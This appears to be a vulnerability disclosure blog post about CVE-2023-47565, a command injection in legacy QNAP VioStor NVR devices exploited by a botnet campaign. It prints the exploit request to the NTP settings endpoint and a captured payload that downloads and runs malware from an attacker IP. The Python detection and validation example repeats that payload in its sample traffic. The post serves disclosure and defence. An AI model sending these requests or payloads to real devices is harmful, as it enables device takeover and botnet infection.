
Actively Exploited Vulnerability in QNAP VioStor NVR: Fixed, Patches Available

Written by Chad Seaman and Larry Cashdollar

December 14, 2023

Chad Seaman

Chad Seaman is a Principal Security Researcher and Team Lead of Akamai’s Security Intelligence Response Team. He proudly refers to himself as an “Internet Dumpster Diver,” and enjoys looking through the muck and mire he finds there. Chad began his career as a programmer, and after being exposed to security, exploitation, and forensics via breach investigations, security quickly became his preferred work. He now spends his time engulfed in malware investigations, reverse engineering, vulnerability research, DDoS, and cybercrime investigations. He likes flying airplanes, poking holes in paper at a distance, and spending time in nature, preferably in the woods, on a trail, or on a dirt bike.

Larry Cashdollar

Larry Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.

Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.

Executive summary

Need to know

As part of our InfectedSlurs research, the SIRT uncovered a vulnerability in QNAP VioStor network video recorder (NVR) devices that is being actively exploited in the wild. The NVR device is a high-performance network surveillance solution for network-based monitoring of IP cameras, video recording, playback, and remote data access. The vulnerability has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.

The vulnerability allows an authenticated attacker to achieve OS command injection via a payload delivered in a POST request to the device's management interface. In practice the authentication requirement is a weak barrier: the captured exploit payloads authenticate with the device's default credentials.

The following versions of QNAP VioStor NVR firmware are affected:

  • VioStor NVR: Versions 5.0.0 and earlier (5.0.0 released June 21, 2014)

QNAP considers these devices discontinued and no longer supported; however, the vendor recommends upgrading the VioStor firmware on existing devices to the latest available version. The issue had already been fixed in a later firmware release, but that fix was never publicly reported or disclosed. Furthermore, users should change the default passwords on their devices.

Additionally, US-CERT has issued an advisory.

Exploitation observed

Initially, when we reviewed exploit payloads during the InfectedSlurs campaign, we reported on only two zero-day vulnerabilities, because the team could not positively link this third exploit to a specific device or manufacturer. Without that link, it was difficult to confirm the exploit as a zero-day.

After deeper examination of various aspects of the exploit and payload, the SIRT believed the target to be QNAP VioStor NVR devices. These devices fit the campaign's targeting profile and shipped with weak default credentials (documented in their manuals and observed in the exploit). As with the initial two zero-days, the exploit abuses an OS command injection in the NTP settings of the affected Internet of Things (IoT) and NVR devices.

After we relayed these theories to US-CERT, it coordinated with Akamai SIRT and QNAP to review the evidence and help confirm them. Ultimately, QNAP confirmed that the payloads targeted their VioStor devices, which are retired and no longer supported, but only older versions (5.0.0 or earlier) of the previously released firmware.

The vulnerability is exploited by sending a POST request to the /cgi-bin/server/server.cgi path with func=server02_main_submit. The command injection occurs in the value of the SPECIFIC_SERVER parameter, the NTP server setting, which the firmware passes to an OS command without sanitizing it (Figure 1).

URL:
/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=

PAYLOAD:
time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on&SPECIFIC_SERVER=[RCE_PAYLOAD]

Fig. 1: Attempted exploitation of the RCE via command injection

An example of a captured infection payload is shown in Figure 2. The + characters are URL-encoded spaces; once decoded by the CGI handler, the value becomes a shell command line that downloads the bot binary (zerx86) from the attacker's host, marks everything in the working directory executable, and runs the binary.

wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86

Fig. 2: Captured RCE payload
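The following is an added example, not code from Akamai or QNAP. It does two things the exploitation section above describes only in prose: it decodes requests against the vulnerable server.cgi endpoint and flags a SPECIFIC_SERVER value that could not be a legitimate NTP server (shell metacharacters, or anything that is not an IP literal or hostname), and it shows the strict allowlist check a fixed firmware should apply to that value before handing it to any OS command. The endpoint, function name, parameter name and attacker payload are taken from Figures 1 and 2; the sample requests, the helper names and the validation rule are constructed for illustration, and the page does not describe how QNAP's own fix validates the field. The example does not check credentials, so it runs on raw request records from a honeypot or web-server log regardless of whether the login succeeded.

```python
"""
Detection and input-validation example for CVE-2023-47565 (added example,
not Akamai's or QNAP's code).  Runs offline over constructed sample requests.
"""
import ipaddress
import re
from urllib.parse import unquote_plus, urlsplit

# From Figure 1 of the post.
VULN_PATH = "/cgi-bin/server/server.cgi"
VULN_FUNC = "server02_main_submit"
INJECT_PARAM = "SPECIFIC_SERVER"

# Characters that start a new command or substitution when the value reaches
# a shell; a legitimate NTP server name never contains any of them.
SHELL_META = re.compile(r"[;&|`$(){}<>\n\r]")

# RFC 1123 hostname: dot-separated labels of alnum/hyphen, 1-63 chars each,
# no leading or trailing hyphen, 253 chars total, optional trailing dot.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def parse_form(encoded: str) -> dict:
    """Decode application/x-www-form-urlencoded text into {name: value}.

    Splits on '&' only (never ';', which is part of the attacker's payload)
    and turns '+' and %XX escapes into the characters the device would see.
    """
    fields = {}
    for pair in encoded.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        fields[unquote_plus(name)] = unquote_plus(value)
    return fields


def is_valid_ntp_server(value: str) -> bool:
    """Allowlist check (assumed, not QNAP's): accept only an IPv4/IPv6
    literal or an RFC 1123 hostname.  Anything else must be rejected before
    the value is used to build a command."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    return bool(HOSTNAME_RE.match(value))


def analyze_request(method: str, target: str, body: str) -> dict:
    """Classify one HTTP request.

    targeted  - the request hits the vulnerable endpoint and function
    injection - SPECIFIC_SERVER contains shell metacharacters or is not a
                syntactically valid NTP server
    command   - the decoded SPECIFIC_SERVER value (None if absent)
    """
    parts = urlsplit(target)
    query = parse_form(parts.query)
    targeted = (
        method.upper() == "POST"
        and parts.path == VULN_PATH
        and query.get("func") == VULN_FUNC
    )
    command = parse_form(body).get(INJECT_PARAM)
    injection = False
    if targeted and command is not None:
        injection = bool(SHELL_META.search(command)) or not is_valid_ntp_server(command)
    return {"targeted": targeted, "injection": injection, "command": command}


# Constructed sample traffic.  The first record mirrors the captured request
# from Figures 1 and 2; the second is a legitimate NTP change on the same
# endpoint; the third is unrelated traffic.
SAMPLE_REQUESTS = [
    (
        "POST",
        "/cgi-bin/server/server.cgi?func=server02_main_submit&counter=8.540406879901406&APPLY=",
        "time_mode=2&time_YEAR=0&time_MONTH=0&time_DAY=0&time_HOUR=0&time_MINUTE=0"
        "&time_SECOND=0&enable_rtc=1&TIMEZONE=50&year=&month=&day=&CONFIGURE_NTP=on"
        "&SPECIFIC_SERVER=wget+http://94.156.68.148/zerx86;chmod+777+*;./zerx86+viox86",
    ),
    (
        "POST",
        "/cgi-bin/server/server.cgi?func=server02_main_submit&counter=1&APPLY=",
        "time_mode=2&CONFIGURE_NTP=on&SPECIFIC_SERVER=pool.ntp.org",
    ),
    ("GET", "/cgi-bin/login.cgi", ""),
]


def scan(requests=SAMPLE_REQUESTS) -> list:
    """Return the analysis records for every request flagged as injection."""
    return [
        r for r in (analyze_request(m, t, b) for m, t, b in requests)
        if r["injection"]
    ]


if __name__ == "__main__":
    for hit in scan():
        print("exploit attempt, decoded SPECIFIC_SERVER:", hit["command"])
```

The detector deliberately decodes the body itself rather than relying on a library form parser: older parsers treat ';' as a field separator, which would silently split the injected command and hide the later stages (the chmod and the execution). The same allowlist function used for detection is the check the device should have performed on input; rejecting anything that is not an IP literal or hostname removes the injection regardless of how the command is later built.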

Basic security practices matter

The basics matter. These observations once again stress the importance of basic security best practices, such as changing default passwords on devices during initial setup. They also highlight the value of stronger long-term, proactive practices: keeping systems consistently updated to shield against potential attacks, and periodically checking on systems and devices, especially if they exhibit odd behavior.

Conclusion

Once again, our custom honeypot network deployment has provided valuable insights into cyberattacks, revealing previously unknown vulnerabilities. The presence of default credentials and outdated, unsupported networked systems has emerged as a route for botnet infections. Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.

This finding emphasizes the critical importance of enhancing awareness and education on best practices for IoT, highlighting associated risks for the average consumer; the need for awareness extends beyond consumers and applies to manufacturers of these devices as well. Longer software support cycles and security upon setup, such as forced password changes, are critical to maintaining system security.

Stay tuned

The Akamai Security Intelligence Group will continue to monitor threats such as these and report on them to drive awareness in our customers and the security community in general. For more research, follow us on X, formerly known as Twitter, to keep up-to-date on what we’re seeing out there.

The Akamai SIRT would like to thank CISA, US-CERT, and QNAP for their assistance with our communications, coordination, identification, remediation, and disclosure efforts.
